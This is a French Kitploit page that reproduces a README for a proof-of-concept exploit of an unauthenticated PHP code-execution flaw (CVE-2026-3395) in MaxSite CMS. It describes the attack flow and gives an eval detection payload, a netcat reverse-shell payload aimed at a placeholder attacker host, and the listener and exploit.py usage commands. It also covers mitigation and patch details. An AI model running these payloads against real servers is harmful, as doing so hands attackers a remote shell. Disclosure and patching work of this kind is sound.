Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE — Preuve de concept d'exploitation pour l'exécution de code à distance non authentifiée dans MaxSite CMS <= 109.1 via les points de terminaison AJAX de l'éditeur MarkItUp, avec des charges utiles de détection et de shell inversé. | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

Preuve de concept d'exploitation pour l'exécution de code à distance non authentifiée dans MaxSite CMS <= 109.1 via les points de terminaison AJAX de l'éditeur MarkItUp, avec des charges utiles de détection et de shell inversé.

Voir le dépôt
5il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE‑2026‑3395 — Exécution de code à distance non authentifiée dans MaxSite CMS

Author Country Instagram GitHub CVE Exploit Type CVSS

Vue d'ensemble

Vulnérabilité d'exécution de code à distance (RCE) non authentifiée dans MaxSite CMS ≤ 109.1.

La faille provient de contrôles d'autorisation faibles dans les points de terminaison AJAX du plugin d'éditeur MarkItUp, combinés à l'exécution non sécurisée de code PHP fourni par l'utilisateur via le plugin run_php.

  • Découverte / Correction : mars 2026
  • Corrigé dans : MaxSite CMS 109.2
  • Éditeur : MaxSite CMS
  • Dépôt : maxsite/cms

Description

La vulnérabilité affecte les fichiers suivants du plugin d'éditeur MarkItUp :

  • preview-ajax.php
  • autosave-post-ajax.php

Ces points de terminaison :

  • Sont accessibles sans authentification
  • Effectuent uniquement une validation faible du référent (facilement contournable)
  • Transmettent l'entrée utilisateur au plugin run_php
  • Exécutent les shortcodes [php]...[/php] à l'aide de eval()

Un attaquant peut envoyer une requête POST falsifiée à la route /ajax/ contenant un chemin interne encodé en Base64 et une charge utile PHP malveillante via le paramètre data, ce qui entraîne :

🚨 Exécution de code à distance complète non authentifiée


Schéma du flux d'attaque

root@kitploit:~
graph TD
    A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
    B -->|"Referer Spoofing"| C["preview-ajax.php"]
    C -->|"Unsanitized Input"| D["run_php Plugin"]
    D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
    E -->|"Command Execution"| F["Compromised Server"]

Prérequis

  • Version de MaxSite CMS ≤ 109.1
  • Plugin run_php activé (par défaut courant)
  • Configuration PHP autorisant eval()

Exploitation

Un exploit de preuve de concept en Python 3 (exploit.py) est inclus.

Charge utile de détection (non destructive)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

Charge utile de shell inversé

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

Utilisation

1. Démarrer l'écouteur

root@kitploit:~
nc -lvnp 9001

2. Exécuter l'exploit

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

Atténuation

Actions immédiates

  • Mettre à niveau vers MaxSite CMS 109.2 ou version ultérieure
  • Désactiver le plugin run_php s'il n'est pas requis

Correctif manuel

Ajouter des contrôles d'authentification aux fichiers vulnérables :

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

Références

  • Commit du correctif https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • Entrée de vulnérabilité https://vuldb.com/?id.348281

  • Enregistrement NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3395


Avis légal

Ce projet est fourni pour :

  • La recherche en sécurité
  • Des fins éducatives
  • Des tests d'intrusion autorisés

⚠️ Ne pas l'utiliser contre des systèmes sans autorisation explicite.

L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages.


Auteur

Mohammed Idrees Banyamer Jordanie 🇯🇴 Chercheur en sécurité

banyamer_security — Silent Hunter • Shadow Presence

Mars 2026

Télécharger l’outil